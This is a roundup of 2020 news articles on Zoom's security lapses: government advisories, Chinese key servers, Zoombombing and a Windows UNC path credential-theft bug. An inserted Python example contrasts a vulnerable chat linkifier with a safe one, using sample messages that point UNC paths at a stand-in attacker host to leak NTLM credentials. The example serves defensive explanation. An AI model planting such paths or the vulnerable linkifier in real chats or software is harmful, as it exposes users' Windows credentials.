Indian Government says Zoom video app unsafe, must not be used for its meetings: Report
The MHA mentioned that "those private individuals who still would like to use Zoom for private purposes" should follow certain guidelines
Zoom app has apparently become a favorite and famous tool among people during the lockdown and it is being used by schools and many private players.
The Cyber Coordination Centre (CCC) of the Ministry of Home Affairs has warned people that the Zoom video conferencing app for meetings is not a safe platform for government and official use, IANS reported.
In the advisory, issued on April 12, it said that "secure use of Zoom meeting platform is for private individuals and not for use of government offices or official purposes". The advisory added that CERT-In had, along the same lines, issued notices on February 6 and March 30 this year clarifying that "Zoom is not a safe platform".
In a set of guidelines for the safety of private users, the CCC division of the MHA said that "those private individuals who still would like to use Zoom for private purposes" should follow certain guidelines, such as preventing unauthorized entry into the conference room and preventing unauthorized participants from carrying out malicious activity on the terminals of others in the conference. The advisory also suggested that users "avoid 'DOS' attacks by restricting users through passwords and access grant".
"Most of the settings can be done by logging into the user's Zoom account on the website, or the installed application on PC/Laptop/Phone, and also while conducting a conference," the MHA guidelines state.
Officials in the Home Ministry told IANS that the app has specific weaknesses, including in how it encrypts meeting data, so it is necessary to avoid its use for official purposes.
A report had recently claimed that Zoom is also prone to hacking. The 'Zoom client for Windows' is vulnerable to a 'UNC path injection' vulnerability that could let remote attackers steal login credentials for victims' Windows systems, The Hacker News had reported.
As businesses, schools and colleges and millions of SMBs use the video conferencing tool Zoom in the work-from-home scenario, the US Federal Bureau of Investigation (FBI) had warned that pornographic material was being injected into video meetings. The Boston branch of the law enforcement agency had also said it received multiple reports of Zoom conferences being disrupted by pornographic and/or hate images and threatening language.
With privacy concerns looming, Zoom app yet to appear on Indian radar
On Friday, Canada-based independent research organisation Citizen Lab found that Chinese servers were being used to distribute encryption and decryption keys for video conferences on Zoom
Even though there have been increasing reports of videoconferencing app Zoom being vulnerable to hacking, and a recent investigation revealed the company sends some encryption keys to China, alarm bells are yet to ring in India.
On Friday, Canada-based independent research organisation Citizen Lab found that Chinese servers were being used to distribute encryption and decryption keys for videoconferences on Zoom. “We suspect that keys may be distributed through these (Chinese) servers. A company primarily catering to North American clients that sometimes distributes encryption keys through servers in China is potentially concerning, given that Zoom may be legally obligated to disclose these keys to authorities in China,” the Citizen Lab researchers noted. It also found that the company’s claims about being end-to-end encrypted were misleading.
Zoom has become extremely popular in the past few weeks, with most parts of the world under lockdown due to the ongoing Covid-19 pandemic and people working from home. The app even surpassed WhatsApp and TikTok in the number of downloads on the Google Play store last week.
In response, Zoom Chief Executive Officer (CEO) Eric Yuan said in a blog post the same day, that in its haste to support the vast number of users it was adding, the company failed to fully implement its usual geofencing best practices. “However, in February, Zoom rapidly added capacity to our Chinese region to handle a massive increase in demand. In our haste, we mistakenly added our two Chinese data centers to a lengthy white list of back-up bridges, potentially enabling non-Chinese clients to — under extremely limited circumstances — connect to them,” he said.
The blog post also said that the error had no impact on its Zoom for Government Cloud, a separate cloud service for government customers. Several Indian enterprises and even government meetings take place on Zoom.
Coupled with these revelations and earlier privacy concerns, including sharing user data with LinkedIn and Facebook and ‘Zoom bombing’, where people can enter Zoom meetings uninvited and share hate speech or pornographic images, the San José-based company has lost clients like Tesla and the New York City Department of Education.
In India, however, as Zoom gains popularity, there hasn’t been any large-scale impact; a large number of businesses and governments continue to use the platform.
The Indian Computer Emergency Response Team (CERT-In) put out an advisory on March 30 about ‘secure usage of Zoom videoconferencing application’, detailing the steps users should take to ensure their data remains protected.
“There is nothing as such that we have done. We checked with Zoom and they assured us that Indian data is not being sent to Chinese servers,” said a government official.
Similarly, companies which use Zoom extensively for meetings have been telling their employees to be more careful with the use of the software. A large firm in the information technology sector has been sending emails to its employees educating them on the proper and safe use of Zoom.
Cyber security experts, however, say that for more sensitive meetings, users should consider moving to alternative, more secure applications. “I recommend using other end-to-end encrypted video platforms to ensure privacy. Also, I would not recommend free software for sensitive or private meetings. For example, Cisco’s Webex, Signal, etc ensure the maximum level of security by adjusting the platform’s settings. To avoid being ‘Zoombombed’, users should avoid sharing the link or meeting ID on social media or other public websites,” said Manan Shah, founder and CEO of cyber security firm Avalance Global Solutions.
Rajshekhar Rajaharia, an independent cyber security researcher, said Zoom passwords for private meetings can also get indexed on Google. He cautioned users that, when starting a meeting on Zoom, one should not share an invitation URL that already contains the password. “You can share a meeting ID and password separately because people can misuse the URL or they may be indexed by Google. Previously invitations to WhatsApp group chats were being indexed by Google,” he said.
Vulnerability in Zoom app let hackers steal your Windows password: Report
Another media report claimed that Zoom doesn't use end-to-end encryption to protect calling data of its users
Slammed for the lack of users' privacy and security by the US Federal Bureau of Investigation (FBI) and cyber security experts, video meeting app Zoom is also prone to hacking, a new report has claimed, saying an unpatched bug can let hackers steal users' Windows passwords. The 'Zoom client for Windows' is vulnerable to a 'UNC path injection' vulnerability that could let remote attackers steal login credentials for victims' Windows systems, reports The Hacker News. The latest finding by cyber security expert @_g0dmode has also been "confirmed by researcher Matthew Hickey and Mohamed A. Baset," the report said late Wednesday.
The attack relies on the "SMB Relay technique": when Windows attempts to connect to a remote server and download a file hosted on it, it automatically sends the user's login username and an NTLM authentication response (derived from the password hash, and crackable offline or relayable to other services) to that server. "The attack is possible only because Zoom for Windows supports remote UNC paths, which converts such potentially insecure URLs into hyperlinks for recipients in a personal or group chat," the report claimed.
Besides Windows credentials, the vulnerability can also be exploited to launch any programme present on a targeted computer.
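The behaviour described above, a chat linkifier that turns a UNC path such as \\host\share\file into something clickable, can be shown beside a hardened version. The following is an added illustration, not Zoom's code or the code from the report; the sample chat messages, host names and the chat-linkifier functions are constructed for the example.

```python
import re
from html import escape

# Constructed sample chat messages for the example (not real Zoom traffic).
# The second and third carry UNC paths pointing at an attacker-controlled host;
# clicking such a link makes Windows open the path over SMB and authenticate
# with the user's NTLM credentials to that host.
SAMPLES = [
    "meeting notes: https://example.org/agenda",
    r"grab the deck from \\10.0.0.5\share\deck.pptx",
    r"also \\attacker.example\c$\run.exe",
]

# \\host\share... : two leading backslashes, a host, a backslash, then the rest.
UNC_RE = re.compile(r"\\\\[^\s\\]+\\[^\s]+")
# Only plain http(s) URLs; stops at whitespace and HTML-significant characters.
HTTP_RE = re.compile(r"https?://[^\s<>\"]+")


def linkify_naive(text: str) -> str:
    """Vulnerable pattern: every UNC path becomes an anchor (hypothetical linkifier).

    The href is the raw \\\\host\\share path, so a Windows client that follows it
    performs an SMB connection to 'host' and sends NTLM authentication.
    """
    out = escape(text)
    out = HTTP_RE.sub(lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', out)
    out = UNC_RE.sub(lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', out)
    return out


def linkify_safe(text: str) -> str:
    """Hardened pattern: only http(s) URLs become links; UNC paths stay inert text."""
    out = escape(text)
    return HTTP_RE.sub(
        lambda m: f'<a href="{m.group(0)}" rel="noopener noreferrer">{m.group(0)}</a>',
        out,
    )


def find_unc_paths(text: str) -> list:
    """Return every UNC path found in a message (useful for scanning chat exports)."""
    return UNC_RE.findall(text)


def flag_unc_messages(messages: list) -> list:
    """Indexes of messages that contain at least one UNC path."""
    return [i for i, msg in enumerate(messages) if find_unc_paths(msg)]


if __name__ == "__main__":
    for msg in SAMPLES:
        print("naive :", linkify_naive(msg))
        print("safe  :", linkify_safe(msg))
    print("flagged messages:", flag_unc_messages(SAMPLES))
```

The hardened variant is an allow-list on the scheme rather than a deny-list on backslashes, so other local-resource forms (file:, drive-letter paths) are also left unlinked; the scanning helpers are the kind of check a defender can run over exported chat logs to see whether anyone has been seeding UNC paths into meetings.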
Zoom has been notified of this bug but the flaw is yet to be fixed.
"Users are advised to either use an alternative video conferencing software or use Zoom in the web browser instead of the dedicated client app," said the report. Another media report claimed that Zoom doesn't use end-to-end encryption to protect the calling data of its users.
As businesses, schools and colleges and millions of SMBs use the video conferencing tool Zoom in the work-from-home scenario, the US Federal Bureau of Investigation (FBI) has warned that pornographic material is being injected into video meetings.
The Boston branch of the law enforcement agency said it has received multiple reports of Zoom conferences being disrupted by pornographic and/or hate images and threatening language.
The video conferencing app late last month updated its iOS app to remove the software development kit (SDK) that was providing users' data to Facebook through the Login with Facebook feature.
Coronavirus: I really messed up on security, says Zoom chief Eric Yuan
The service, once mostly used for client conferences and training webinars, has emerged in the coronavirus lockdown as a home for virtual cocktail hours, exercise classes, cabinet meetings
Chief Executive Officer Eric Yuan started the mea-culpa messaging with an April 1 blog post on Zoom Video Communications’ website, saying “we recognise that we have fallen short of the community’s — and our own — privacy and security expectations.”
Zoom’s boss embarked on an apology tour to reassure users that he’s working to improve security and privacy on the videoconferencing app that has emerged as the virtual town square of the coronavirus epidemic.
The service, once mostly used for client conferences and training webinars, has emerged in the coronavirus lockdown as a home for virtual cocktail hours, exercise classes, cabinet meetings and remote classroom learning. But during the 20-fold surge to 200 million daily members since the end of last year, the service has been hit by trolls interjecting porn or hijacking meetings and drawn regulators’ scrutiny about privacy.
Chief Executive Officer Eric Yuan started the mea-culpa messaging with an April 1 blog post on Zoom Video Communications’ website, saying “we recognise that we have fallen short of the community’s — and our own — privacy and security expectations.” He sounded similar notes in an interview in The Wall Street Journal and a Sunday appearance on CNN’s Reliable Sources.
“I really messed up as CEO, and we need to win their trust back,” Yuan told The Wall Street Journal. “This kind of thing shouldn’t have happened.”
The lapses have driven away customers including Elon Musk, who banned the use of Zoom for SpaceX and Tesla due to privacy concerns. New York City has directed its schools — a system with more than 1.1 million students — to move away from using Zoom as soon as possible.
“We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place,” said Danielle Filson, a spokeswoman for the New York City Department of Education. The company is working to protect privacy, including adding end-to-end encryption that is still months away, Yuan said. For now he’s trying to keep customers on board. Many of the problems stem from the fact that the app was geared toward enterprise clients with their own IT security teams, rather than the broad consumer app it has become.
“We are still in the process of working with New York schools to make sure we do enforce security safety,” Yuan told CNN. Since the public-health crisis unfolded, Zoom has become the most downloaded free app on Apple’s iOS App Store, ahead of TikTok, DoorDash, and Disney+.